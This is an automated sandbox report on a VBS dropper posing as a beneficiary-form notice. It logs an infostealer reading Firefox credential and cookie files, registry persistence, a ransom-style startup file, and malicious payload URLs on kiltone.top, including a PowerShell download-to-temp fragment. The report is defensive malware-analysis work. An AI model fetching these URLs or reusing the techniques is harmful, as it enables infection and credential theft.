Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\pkcs11.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionCheckpoints.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532976.f626f4c3-4652-4b17-a31d-20b62aabb4bc.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\search.json.mozlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526932.a88cd073-7a8b-423f-bd0e-4c9cfe05f0fa.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\cb77fc44-213e-46f2-a233-e27b26b3b3e2
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\state.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\f30d6b3f-1d43-4dd4-add9-f29c1313c2dd
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\SiteSecurityServiceState.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\containers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events\events
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\protections.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\.metadata-v2
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\compatibility.ini
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\handlers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\session-state.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\extension-preferences.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\shield-preference-experiments.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\addonStartup.json.lz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\addons.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\ls-archive.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526938.6f88a504-672b-429f-becc-5f24bfcb1009.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events\background-update
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526924.bb2f07d2-72ba-475b-89d6-f1004541a20e.new-profile.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532955.5c52a77f-c922-4d05-b4a5-35092432cb64.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526939.711b9395-807b-4c7f-a045-dd83b14de7aa.first-shutdown.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\parent.lock
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\AlternateServices.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\previous.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\6f88a504-672b-429f-becc-5f24bfcb1009
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532994.855442d8-08ff-437c-ab54-8b85f7a1de31.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-wal

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Exploitation for Client Execution	221 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	3 PowerShell	1 DLL Side-Loading	11 Process Injection	1 Obfuscated Files or Information	LSASS Memory	22 System Information Discovery	Remote Desktop Protocol	1 Browser Session Hijacking	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File Deletion	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Masquerading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Rundll32	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
NOTIFICATION_OF_DEPENDANTS.vbs	3%	ReversingLabs	Win32.Dropper.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\eryy65ty.exe	47%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\fjeljies.cpl	50%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp	0%	Avira URL Cloud	safe
https://www.oldmutual.co.za/favicon.ico	0%	Avira URL Cloud	safe
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443	0%	Avira URL Cloud	safe
https://kiltone.top/stelin/rwcla.	0%	Avira URL Cloud	safe
https://kiltone.top/stelin/Gosjeufon.cpl	100%	Avira URL Cloud	malware
https://kiltone.top/stelin/rwcla.cpl	100%	Avira URL Cloud	malware
file:///C:/Users/user/Downloads/downloaded.pdf	0%	Avira URL Cloud	safe
https://www.oldmutual.co.za/v3/assets/blt0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
d12y248af9ueom.cloudfront.net	18.161.69.16	true	false	unknown
www.google.com	142.250.181.132	true	false	high
kiltone.top	45.125.67.168	true	true	unknown
www.oldmutual.co.za	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf	true		unknown
file:///C:/Users/user/Downloads/downloaded.pdf	false	Avira URL Cloud: safe	unknown
https://www.oldmutual.co.za/favicon.ico	false	Avira URL Cloud: safe	unknown
https://kiltone.top/stelin/Gosjeufon.cpl	true	Avira URL Cloud: malware	unknown
https://kiltone.top/stelin/rwcla.cpl	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.avito.ru/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://digify.com/a/#/access/login	rundll32.exe, 00000015.00000002.2161641994.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, fjeljies.cpl.13.dr	false		high
https://www.ctrip.com/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.leboncoin.fr/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp	cmd.exe, 0000001B.00000002.1770145202.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.bellmedia.c	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://weibo.com/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://login.microsoftonline.com	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443	wscript.exe, 00000000.00000003.1572415857.0000011AB7EBA000.00000004.00000020.00020000.00000000.sdmp, NOTIFICATION_OF_DEPENDANTS.vbs	true	Avira URL Cloud: safe	unknown
https://www.ifeng.com/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.zhihu.com/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
http://x1.c.lencr.org/0	cert9.db.32.dr	false		high
http://x1.i.lencr.org/0	cert9.db.32.dr	false		high
https://www.msn.com	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.oldmutual.co.za/v3/assets/blt0	wscript.exe, wscript.exe, 00000000.00000002.1574200760.0000011AB8065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1575418983.0000011AB9DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1573963489.0000011AB7EBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1572415857.0000011AB7EBA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5	places.sqlite.32.dr	false		high
https://www.reddit.com/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.amazon.ca/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.ebay.co.uk/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://github.com/mozilla/webcompat-reporter	extensions.json.32.dr	false		high
https://www.amazon.co.uk/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.ebay.de/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://screenshots.firefox.com/	extensions.json.32.dr	false		high
https://www.amazon.com/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	cert9.db.32.dr	false		high
http://crl.ver)	svchost.exe, 0000000E.00000002.2703518448.000002794C600000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	cert9.db.32.dr	false		high
https://www.wykop.pl/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://twitter.com/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://digify.com/a/#/access/logincmd	fjeljies.cpl.13.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	places.sqlite.32.dr	false		high
https://www.olx.pl/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.youtube.com/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://allegro.pl/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://support.mozilla.org/products/firefox	favicons.sqlite.32.dr	false		high
https://MD8.mozilla.org/1/m	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.bbc.co.uk/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://bugzilla.mo	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://g.live.com/odclientsettings/Prod-C:	edb.log.14.dr	false		high
https://kiltone.top/stelin/rwcla.	wscript.exe, 00000000.00000002.1574200760.0000011AB8065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1575418983.0000011AB9DF0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.amazon.fr/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://g.live.com/odclientsettings/ProdV2-C:	svchost.exe, 0000000E.00000003.1487710421.000002794C810000.00000004.00000800.00020000.00000000.sdmp, edb.log.14.dr	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	cert9.db.32.dr	false		high
https://www.google.com/complete/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.google.com/search?client=firefox-b-d&q=&metrics#search.engine.default.verified	data.safe.bin.32.dr	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	prefs.js.32.dr	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	prefs.js.32.dr	false		high
https://support.mozilla.org	places.sqlite.32.dr	false		high
https://www.google.com/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.google.com/search?client=firefox-b-d&q=&	data.safe.bin.32.dr	false		high
https://www.iqiyi.com/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.amazon.de/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high
https://www.baidu.com/	3870112724rsegmnoittet-es.sqlite.32.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.125.67.168	kiltone.top	Hong Kong	133398	TELE-ASTeleAsiaLimitedHK	true
142.250.181.132	www.google.com	United States	15169	GOOGLEUS	false
18.161.69.16	d12y248af9ueom.cloudfront.net	United States	3	MIT-GATEWAYSUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.9
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578028
Start date and time:	2024-12-19 07:51:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	66
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NOTIFICATION_OF_DEPENDANTS.vbs
Detection:	MAL
Classification:	mal100.rans.phis.troj.spyw.expl.evad.winVBS@98/804@7/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.17.78, 64.233.162.84, 172.217.17.46, 184.28.90.27, 192.229.221.95, 172.217.17.35, 34.104.35.123, 172.217.19.206, 4.245.163.56
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: NOTIFICATION_OF_DEPENDANTS.vbs

Simulations

Behavior and APIs

Time	Type	Description
01:52:17	API Interceptor	116x Sleep call for process: powershell.exe modified
01:52:24	API Interceptor	2x Sleep call for process: svchost.exe modified
01:52:52	API Interceptor	1x Sleep call for process: rundll32.exe modified
01:52:58	API Interceptor	6x Sleep call for process: WMIC.exe modified
06:52:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XPSUDTARW C:\Users\user\AppData\Local\Temp\eryy65ty.exe
06:53:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XPSUDTARW C:\Users\user\AppData\Local\Temp\eryy65ty.exe
06:53:26	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt

LLM Input / Output

Input	Output
URL: https://oldmutual.co.za Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://oldmutual.co.za
URL: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "NOTIFICATION OF DEPENDANTS AND BENEFICIARIES FORM", "prominent_button_name": "unknown", "text_input_field_labels": [ "Employer/Company name", "Scheme code", "Member's reference number", "First name(s)", "Surname", "ID number/Passport number", "Telephone (Home)", "Cellphone number", "Email address" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Downloads/downloaded.pdf Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "NOTIFICATION OF DEPENDANTS AND BENEFICIARIES FORM", "prominent_button_name": "unknown", "text_input_field_labels": [ "Employer/Company name", "Scheme code", "Member's reference number", "First name(s)", "Surname", "ID number/Passport number", "Telephone (Home)", "Cellphone number", "Email address" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf Model: Joe Sandbox AI	{ "brands": [ "Old Mutual" ] }
	{ "brands": [ "Old Mutual" ] }
URL: file:///C:/Users/user/Downloads/downloaded.pdf Model: Joe Sandbox AI	{ "brands": [ "Old Mutual" ] }
	{ "brands": [ "Old Mutual" ] }
URL: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf Model: Joe Sandbox AI	```json{ "legit_domain": "oldmutual.co.za", "classification": "known", "reasons": [ "The URL 'www.oldmutual.co.za' matches the legitimate domain name for Old Mutual, a well-known financial services company in South Africa.", "The brand 'Old Mutual' is classified as 'known' due to its established presence in the financial sector.", "There are no suspicious elements in the URL such as misspellings, extra characters, or unusual domain extensions.", "The input fields are typical for a financial services website, which often requires personal and contact information." ], "riskscore": 1}
URL: www.oldmutual.co.za Brands: Old Mutual Input Fields: Employer/Company name, Scheme code, Member's reference number, First name(s), Surname, ID number/Passport number, Telephone (Home), Cellphone number, Email address

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	Tbconsulting Company Guidelines Employee Handbook.docx	Get hash	malicious	Unknown	Browse
	https://pdf.ac/4lLzbt	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse
	https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=	Get hash	malicious	Unknown	Browse
	doc55334.html	Get hash	malicious	HTMLPhisher	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig	Browse
	vRecord__0064secs__warriorsheart.com.html	Get hash	malicious	Unknown	Browse
	http://url8004.msimga.com/ls/click?upn=u001.53NcgwDAAzhzVFiwjkq594MAJWCPhEkQColfld-2B8UTVheZTNvS5XHSLoMFMDMKqB8ozH_SekqilKQ-2BHgXRJqfGhzOp5U5QgEa3j9iCU-2B-2FEmLhcgIb8j4-2F70z5BTR3SsHgk6fUAqo-2B4Hk5qOUpxx5ix21Dz7RacjGAlZQG7X9ZmY-2FMz6G3UEXqPfDFnluOo3vFEWoRVVv0USeiaKWrnmFmXbwzEtxKNaPSY-2FlO1e5ZdfV1YqhnRlOqnd6p2D4F2b2ZE6xQpyHLUek-2FYrpkq3KQVjrFQw-3D-3D	Get hash	malicious	Unknown	Browse
